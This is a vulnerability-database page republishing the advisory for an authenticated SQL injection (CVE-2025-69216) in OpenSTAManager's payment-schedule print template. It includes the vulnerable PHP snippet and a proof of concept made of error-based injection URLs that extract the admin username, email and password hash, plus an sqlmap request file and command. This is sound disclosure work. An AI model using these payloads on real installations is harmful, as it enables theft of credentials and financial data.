Loading...
Skip to main content

CVE-2025-69216

HIGH

OpenSTAManager has a SQL Injection in Scadenzario Print Template

Published February 6, 2026Updated February 10, 2026Source: osv

Summary

### Summary An **authenticated SQL Injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques. ### Details The vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization: **Vulnerable Code:** ```php if (get('id_anagrafica') && get('id_anagrafica') != 'null') { $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query); $id_anagrafica = get('id_anagrafica'); } ``` The `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's `prepare()` sanitization function, enabling SQL Injection attacks. **Root Cause:** - Missing use of `prepare()` function for input sanitization - Direct string concatenation in SQL query construction - No input validation or type checking **Affected Endpoint:** ``` /pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD] ``` **Affected Files:** - `templates/scadenzario/init.php` (line 46) - **Primary vulnerability** - `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters - `pdfgen.php` - Entry point for template rendering --- ### PoC (Proof of Concept) #### Prerequisites - Valid authenticated session (any user role) #### Exploitation Steps **1. Confirm Vulnerability - Basic Syntax Error Test:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20 ``` SQL syntax error displayed in application response <img width="2195" height="392" alt="image" src="https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102" /> --- **2. Extract Database Version - Error-Based SQLi:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~8.3.0~` (MySQL version) <img width="2061" height="378" alt="image" src="https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f" /> --- **3. Extract Database Name:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~openstamanager~` <img width="1954" height="345" alt="image" src="https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8" /> --- **4. Extract Admin Username:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~admin~` <img width="1998" height="332" alt="image" src="https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8" /> --- **5. Extract Admin Email:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** Admin email address <img width="2006" height="339" alt="image" src="https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84" /> --- **6. Extract Password Hash (Partial - XPATH 31 char limit):** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** bcrypt password hash <img width="1924" height="328" alt="image" src="https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219" /> --- **7. Automated Exploitation with SQLMap:** Create request file `sqli_osm.req`: ```http GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=[SESSION_COOKIE] User-Agent: Mozilla/5.0 ``` Run SQLMap: ```bash sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs ``` **SQLMap Confirmed Injection Types:** - ✅ Boolean-based blind SQL injection - ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET) - ✅ Time-based blind SQL injection (SLEEP) <img width="1498" height="516" alt="image" src="https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62" /> --- ### Impact **Who is Impacted:** - ✅ **All authenticated users** - Any user with valid credentials can exploit this vulnerability - ✅ **Low-privilege users** - Even users with minimal permissions can access admin-level data - ✅ **All OpenSTAManager installations** - Vulnerability exists in the latest master branch --- ### Attribution Reported by Łukasz Rybak

Affected Packages (1)

PackageEcosystemAffectedFixed In
devcode-it/openstamanager
packagist
2.3.0, v2.4, v2.4.1, v2.4.10 (+83 more)Range-based data available

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 8.8 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Confidentiality
Integrity
Availability

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Frequently Asked Questions

What is CVE-2025-69216?
OpenSTAManager has a SQL Injection in Scadenzario Print Template This vulnerability has been assigned a severity rating of HIGH (CVSS score: 8.8/10).
How do I check if my project is affected by CVE-2025-69216?
CVE-2025-69216 affects devcode-it/openstamanager. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2025-69216 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
8.8

High exploitability or significant impact. Prioritize remediation within days.

Also Known As

GHSA-q6g3-fv43-m2w6

Related CVEs

  • CVE-2025-69212
    CRITICAL

    OpenSTAManager has an OS Command Injection in P7M File Processing

  • CVE-2026-35168
    HIGH

    OpenSTAManager: SQL Injection via Aggiornamenti Module

  • CVE-2025-65103
    HIGH

    OpenSTAManager has Authenticated SQL Injection in API via 'display' parameter

  • CVE-2026-28805
    HIGH

    OpenSTAManager has a Time-Based Blind SQL Injection via `options[stato]` Parameter

  • CVE-2026-24417
    HIGH

    OpenSTAManager has a Time-Based Blind SQL Injection with Amplified Denial of Service

  • CVE-2026-24419
    HIGH

    OpenSTAManager has a SQL Injection in the Prima Nota module

  • CVE-2026-24418
    HIGH

    OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module

  • CVE-2026-35470
    HIGH

    OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies